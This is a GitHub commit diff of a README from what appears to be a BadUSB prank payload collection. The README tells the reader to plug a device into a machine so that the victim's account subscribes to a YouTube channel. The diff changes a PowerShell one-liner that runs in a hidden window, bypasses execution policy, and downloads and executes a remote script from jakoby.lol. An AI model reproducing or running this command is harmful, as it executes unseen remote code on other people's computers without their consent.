Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-15 14:43:29 -06:00 committed by GitHub
parent 20c56d7703
commit 0e189df76d
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -35,9 +35,9 @@ SPOILER: They do.
* Plug in your device
* 15 seconds later you have a new subscriber
* Your youtube url needs to be inside both double and single quotes " ' url ' "
```
powershell -w h -NoP -Ep Bypass $channel='youtube.com/iamjakoby';irm jakoby.lol/wj4 | iex
powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>